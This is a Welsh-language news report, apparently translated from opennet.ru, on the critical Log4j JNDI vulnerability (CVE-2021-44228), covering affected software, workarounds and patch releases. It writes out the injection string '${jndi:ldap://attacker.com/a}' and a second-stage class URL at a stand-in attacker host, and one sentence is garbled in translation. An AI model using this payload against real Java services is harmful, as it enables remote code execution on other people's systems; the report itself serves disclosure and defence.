Mae gwendid critigol wedi'i ddarganfod yn Apache Log4j, fframwaith logio poblogaidd ar gyfer cymwysiadau Java, sy'n caniatáu gweithredu cod mympwyol wrth ysgrifennu gwerth wedi'i grefftio'n arbennig yn y fformat "{jndi:URL}" i'r log. Gellir cynnal yr ymosodiad ar gymwysiadau Java sy'n logio gwerthoedd a gafwyd o ffynonellau allanol, er enghraifft, wrth arddangos gwerthoedd problemus mewn negeseuon gwall.
Nodwyd bod y mater yn effeithio ar bron pob prosiect sy'n defnyddio fframweithiau fel Apache Struts, Apache Solr, Apache Druid, neu Apache Flink, gan gynnwys cleientiaid a gweinyddion Steam, Apple iCloud, a Minecraft. Disgwylir i'r bregusrwydd arwain at don o ymosodiadau torfol ar gymwysiadau corfforaethol, gan ailadrodd hanes y bregusrwydd critigol yn fframwaith Apache Struts, yr amcangyfrifir ei fod yn cael ei ddefnyddio mewn cymwysiadau gwe gan 65% o gwmnïau Fortune 100. Mae ymdrechion i sganio'r rhwydwaith am systemau bregus eisoes wedi'u cofnodi.
Mae'r broblem yn cael ei gwaethygu gan y ffaith bod camfanteisio gweithredol eisoes wedi'i gyhoeddi, ond nid oes atebion ar gyfer canghennau sefydlog wedi'u llunio eto. Nid oes dynodwr CVE wedi'i aseinio eto. Dim ond yn y gangen brofi log4j-2.15.0-rc1 y mae'r ateb wedi'i gynnwys. Fel ateb dros dro, argymhellir gosod y paramedr log4j2.formatMsgNoLookups i wir.
Achoswyd y broblem gan gefnogaeth log4j i brosesu masgiau arbennig "{}" mewn llinellau log, y gellid eu defnyddio i gyflawni ymholiadau JNDI (Java Naming and Directory Interface). Mae'r ymosodiad yn berwi i lawr i basio llinyn gyda'r amnewidiad "${jndi:ldap://attacker.com/a}", a phan gaiff ei brosesu, bydd log4j yn anfon gweinydd Ymholiad LDAP attacker.com ar gyfer llwybr dosbarth Java. Dychwelwyd gweinydd Bydd llwybr yr ymosodwr (e.e. http://second-stage.attacker.com/Exploit.class) yn cael ei lwytho a'i weithredu yng nghyd-destun y broses gyfredol, gan ganiatáu i'r ymosodwr weithredu cod mympwyol ar y system gyda breintiau'r rhaglen gyfredol.
Atodiad 1: Mae'r dynodwr CVE-2021-44228 wedi'i aseinio i'r bregusrwydd.
Diweddariad 2: Mae ateb dros dro ar gyfer yr amddiffyniad a ychwanegwyd yn log4j-2.15.0-rc1 wedi'i ganfod. Cynigiwyd diweddariad newydd, log4j-2.15.0-rc2, gyda diogelwch mwy cynhwysfawr yn erbyn y bregusrwydd. Mae newid cod wedi'i amlygu sy'n atal damweiniau wrth ddefnyddio URL JNDI wedi'i fformatio'n anghywir.
Ffynhonnell: opennet.ru
